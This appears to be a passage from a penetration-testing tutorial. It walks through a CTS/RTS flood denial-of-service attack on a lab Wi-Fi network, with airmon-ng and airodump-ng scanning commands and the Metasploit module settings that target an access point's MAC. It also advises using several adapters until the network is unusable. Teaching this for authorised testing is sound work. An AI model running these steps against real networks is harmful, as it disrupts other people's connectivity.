In a wireless medium, collisions can degrade the performance of the network. In order to avoid collisions, clients transmitting at the same time, wireless clients, and access points use CTS/RTS, clear to send, and request to send frames before transmitting data. Whenever a wireless client wants to send data, it reserves the medium by sending RTS/CTS frames. In simple terms, when a wireless client is about to send some data, it notifies other devices on the network that it's going to send data and asks others to wait for some time before attempting to transmit themselves. Other stations respect the announcement and wait until the transfer is complete. An attacker can use these unauthenticated frames and create a denial of service condition on the target network.
By continuously sending RTS/CTS frames to other devices on the wireless network, the attacker tries to reserve the medium, thus creating an idle network. In practice, this does not ultimately lead to a network down scenario; however, it degrades the performance of the target network, which may be harder for an administrator to identify and troubleshoot.
In this attack scenario, we scan the air for access points and perform CTS/RTS flood attack against the target wireless networks.
Follow these steps to perform a CTS/RTS flood attack using Metasploit:
- Set up the wireless card for scanning, bring the card up, and create a monitor mode interface on the wireless card. Run the following commands to accomplish this task:
#ifconfig wlan0 up
- Then, run the following command:
#airmon-ng start wlan0You should see something like what is shown in the following screenshot:
- Set up a monitor interface to determine the access points in the range that will be targeted:
#airodump-ng mon0
airodump-ng scans all the 14 channels in 2.4 GHz frequency band and gives you the list of indentified access points and their pertinent details. Check out the MAC address of the router we use in our lab. In this case, it is up and running on channel 10 with the SSID Seclab. The encryption and authentication used on the lab router is WPA2 CCMP PSK.
The following output from airodump-ng shows that the wireless client with the MAC address cc:b2:55:ff:2e:1c is connected to the access point Seclab with the MAC address 90:94:e4:c8:04:e8.
To perform a Denial of Service attack on the target network, we can send CTS/RTS frames to wireless devices from Metasploit. As with other Metasploit-based attacks, you will need the lorcon2 package already installed on Kali.
This attack is set up in a fashion similar to other deauthentication flood attacks used with the Metasploit framework. In order to be successful, you will also need the lorcon2 packet injection libraries. Refer to the example on downloading and configuring them under the Metasploit's fake beacon flood attack section. In this attack, we will use the information collected from our wireless identification to target and flood the network with CTS/RTS frames. This will cause clients to yield to the attacker and will result in slower transmission speeds and degraded network performance. To flood the target network with CTS/RTS frames, we use the metasploit auxiliary module named auxiliary/dos/wifi/cts_rts_flood.
The following screenshot shows the available options for this module:
Now, follow the steps listed here:
- Run metasploit:
#msfconsole - Go to the Windows machine. Ping the access point continuously using the following command:
ping router_ip -t - From the attacker machine, use the
auxiliary/dos/wifi/cts_rts_floodauxiliary module inside metasploit:msf> use auxiliary/dos/wifi/cts_rts_flood msf> set ADDR_DST 90:94:e4:c8:04:e8 msf> set TYPE CTS msf> set NUM 10000 msf> set CHANNEL 9 msf> run
In this example, ADDR_DST is the MAC address of the access point that will be targeted for attack, and TYPE tells the module which frame types to send, either RTS (Request to Send) or CTS (Clear to Send). Specify the channel and the number of packets you wish to send, run the module.
You can see that there is no connection drop on the wireless client, but the time taken to reach the access point has increased during the CTS flood attack on the network. The following output from Windows machine confirms this:
To increase the effectiveness of this attack, you can have multiple hosts and wireless adapters, all targeting the same network with CTS and RTS frames. This can sufficiently slow the network to a point where it is unusable by the legitimately connected clients.
In this attack, we performed scanning in order to detect wireless access points, and when found, we performed a CTS/RTS flood attack against the target network. This attack tells legitimately connected clients that the network is busy and they need to wait before transmitting frames onto the wireless network. The result is degraded performance for the connected clients to the point where the network may be unusable.